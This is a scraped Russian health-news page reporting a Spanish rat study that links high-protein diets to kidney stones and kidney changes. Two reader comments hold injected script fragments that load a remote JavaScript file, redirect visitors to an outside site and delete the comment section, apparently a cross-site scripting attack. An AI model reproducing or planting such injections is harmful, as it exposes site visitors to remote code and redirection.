Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кремлевская диета убивает...  >>  Кремлевская диета убивает ваши почки
 
Обратная связь
 

Кремлевская диета убивает ваши почки

Размер шрифта
23 апреля 2014 00:00
  • google_analytics: false
  • Нравится

Проведя серию экспериментов на крысах, испанские ученые пришли к выводу, что высокобелковая диета повышает риск развития мочекаменной болезни и других заболеваний почек.

Кремлевская диета убивает ваши почки

Высокобелковые диеты являются одними из самых популярных: диета Дюкана, Аткинса, кремлевская диета – все это примерно одна и та же песня, звучащая на разный лад. Ученые из университета Гранады (Испания) обнаружили, что такие диеты повышают вероятность развития ряда заболеваний почек в долгосрочной перспективе. В частности, повышается риск камней в почках, поскольку белковая диета способствует значительному снижению pH мочи и концентрации цитрата в ней, а также повышает почечную экскрецию кальция. В совокупности эти три фактора приводят к образование кальциевых солей в виде камней, которые закупоривают просвет протока.

Авторы разделили испытуемых крыс на две равные группы. В первой из них животные питались концентрированным (45%) гидролизатом белка. Во второй (контрольной) группе крыс кормили стандартной пищей. Эксперимент длился двенадцать недель, что эквивалентно девяти годам человеческой жизни.

В результате оказалось, что крысы на высокобелковой диете потеряли до 10% от изначального веса, при этом без каких бы то ни было улучшений в липидном профиле плазмы крови. Далее: концентрация цитрата мочи у них оказалось на 88% ниже нормы, а pH – на 15%. У таких животных масса почки в среднем была повышена на 22%, площадь клубочкового фильтра – на 13%, доля мезангия (соединительно-тканной структуры, окружающей капилляры) – на 32%.

«Результаты, полученные нами, указывают на необходимость тщательного мониторинга состояния пациентов, которые находятся на белковой диете», – уверена доктор Виргиния Апарацио, научный сотрудник кафедры физиологии университета Гранады. «Диета Дюкана и ей подобные могут приводить к весьма серьезным негативным последствиям для здоровья в отдаленной перспективе».

Доктор Апарацио также подчеркивает, что степень потенциального вреда, который белковая диета может нанести почкам, зависит от наличия или отсутствия других питательных веществ в рационе. «Если есть много фруктов и овощей, то риск развития нефролитиаза снижается – по всей видимости, благодаря большому содержанию калия и магния, которые отчасти компенсируют кислотность, генерируемую белковыми диетами», – говорит Апарацио.

Если вы хотите реально похудеть – специально для вас «Диета Елены Малышевой».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

04 мая 2014 в 23:38

Цитировать   |   Пожаловаться

Привет. 
У меня были раньше были проблемы с лишним весом. Я начал искать диету и пробовать поочереди каждую, не стоит зацикливаться на одной.
Базируется она на понижении количества потребляемых углеводах. А ведь в большинстве случаев толстеют именно от чрезмерного потребления углеводов :)

2 - zzzzzz

30 июня 2015 в 18:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Диета по группе крови – полный обман! Как реально похудеть?   Даже свет во сне приводит к лишним килограммам! Как похудеть?!  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.